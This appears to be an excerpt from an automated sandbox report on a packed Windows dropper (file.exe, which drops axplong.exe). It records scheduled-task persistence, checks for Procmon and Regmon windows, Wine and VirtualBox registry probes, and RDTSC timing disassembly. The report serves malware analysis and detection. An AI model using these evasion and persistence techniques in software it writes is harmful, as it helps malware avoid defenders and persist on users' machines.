                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1936896 > 1048576
                  Source: file.exeStatic PE information: Raw size of hsrzezej is bigger than: 0x100000 < 0x1a7400

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hsrzezej:EW;vqlpxtuc:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e1e2e should be: 0x1de922
                  Source: file.exeStatic PE information: real checksum: 0x1e1e2e should be: 0x1de922
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: hsrzezej
                  Source: file.exeStatic PE information: section name: vqlpxtuc
                  Source: file.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: hsrzezej
                  Source: axplong.exe.0.drStatic PE information: section name: vqlpxtuc
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: file.exeStatic PE information: section name: entropy: 7.980121831672435
                  Source: file.exeStatic PE information: section name: hsrzezej entropy: 7.9531207012657585
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.980121831672435
                  Source: axplong.exe.0.drStatic PE information: section name: hsrzezej entropy: 7.9531207012657585
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E85B second address: 8E860 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2112DD second address: 2112E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2112E5 second address: 211303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05ECE231C9h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 210346 second address: 210362 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F05ECFAD312h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2107A0 second address: 2107A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2107A5 second address: 2107AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2107AB second address: 2107BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21402C second address: 214032 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214032 second address: 2140A8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F05ECE231B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e jns 00007F05ECE231BCh 0x00000014 jne 00007F05ECE231B6h 0x0000001a pop esi 0x0000001b nop 0x0000001c jnp 00007F05ECE231BCh 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F05ECE231B8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e call 00007F05ECE231C0h 0x00000043 jg 00007F05ECE231BBh 0x00000049 pop edi 0x0000004a movsx esi, si 0x0000004d call 00007F05ECE231B9h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2140A8 second address: 2140AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2140AD second address: 2140B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2141EB second address: 21420C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F05ECFAD306h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F05ECFAD311h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21420C second address: 214210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214252 second address: 214258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214258 second address: 214283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F05ECE231C4h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214283 second address: 214289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214289 second address: 21428D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21428D second address: 2142B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 4A78h 0x0000000d push 00000000h 0x0000000f or dword ptr [ebp+122D26FEh], ebx 0x00000015 push 8FA23598h 0x0000001a jp 00007F05ECFAD314h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2142B0 second address: 2142B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2328DC second address: 2328EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F05ECFAD339h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232A5D second address: 232A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232E93 second address: 232EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F05ECFAD30Ch 0x0000000b popad 0x0000000c jc 00007F05ECFAD30Ch 0x00000012 ja 00007F05ECFAD312h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232EBA second address: 232EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 233312 second address: 233341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F05ECFAD311h 0x00000010 jo 00007F05ECFAD312h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23349B second address: 2334A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2334A6 second address: 2334AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 229715 second address: 22971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22971B second address: 229731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05ECFAD311h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 229731 second address: 229742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F05ECE231BBh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 233E7E second address: 233E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F7D88 second address: 1F7DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F05ECE231B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F7DAC second address: 1F7DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F7DB0 second address: 1F7DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F7DB6 second address: 1F7DE1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05ECFAD30Ch 0x00000008 js 00007F05ECFAD306h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F05ECFAD311h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2387DD second address: 2387E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2387E3 second address: 2387E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238C4B second address: 238C55 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238C55 second address: 238C6A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05ECFAD30Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237514 second address: 237519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23CED0 second address: 23CEDA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05ECFAD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCED0 second address: 1FCEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F05ECE231B6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F05ECE231B6h 0x00000017 jng 00007F05ECE231B6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCEED second address: 1FCEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240298 second address: 2402BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05ECE231BCh 0x00000008 jmp 00007F05ECE231BAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jg 00007F05ECE231B6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2402BF second address: 2402D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05ECFAD314h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2402D8 second address: 2402F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2402F5 second address: 2402F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2402F9 second address: 240311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
